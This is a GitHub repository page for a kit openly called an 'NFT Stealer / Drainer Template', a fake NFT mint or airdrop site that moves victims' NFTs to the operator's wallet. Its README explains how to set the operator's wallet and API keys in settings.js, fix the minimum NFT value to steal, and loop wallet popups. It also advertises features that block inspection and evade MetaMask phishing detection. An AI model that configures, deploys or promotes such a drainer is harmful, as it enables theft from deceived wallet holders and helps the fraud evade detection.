Skip to content

syr1u5/Nftclaimairdrop

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

15 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

⚠️ If you need any help, DM me here: @NFTMontana

🖼️ NFT Stealer / Drainer Template

preview

💡 Features

  • Inspect Element Detection
  • Custom Design
  • Cool design
  • Instant transactions
  • No contract required
  • Anti Metamask Phishing Detections
  • Anti F12 Inspect

🖍️ Setup Guide:

you need to edit the settings.js file.

  • line 1: const adress = "YOUR WALLET"; replace YOUR WALLET with your ETH wallet address.

  • line 2: const infuraId = "APP ID"; replace APP ID with your Infura ID

  • line 3: const moralisApi = "X-API-KEY"; replace X-API-KEY with your Moralis web3 api key

    • Also, line after "const mintInfo" will change the minting price, the maximum supply, the minimum to be minted if the person doesn't have any NFTs, the maximum to be minted...
    • Line "askMintLoop: true" = metamask popup will open again and again until the popup is closed.

☁️ Important :

  • Lines after "const drainNftsInfo" will be used for the NFT drainer.
  • Edit lines : nftReceiveAddress: "YOUR WALLET", replace YOUR WALLET with your ETH wallet address.
  • Line "minValue: 0.2," is the minimum value of a NFT before it gets stolen. Exemple : If you change this value to 1, the script will only steal NFTs that have a value higher to 1.

To get instant support, contact me on my Telegram

👻 Why it doesn't show my address?

This NFT stealer interacts directly with the nft contract to transfer it to your address located in the settings.js file. view

Releases

No releases published

Packages

No packages published

Languages

  • CSS 75.5%
  • HTML 13.7%
  • JavaScript 10.8%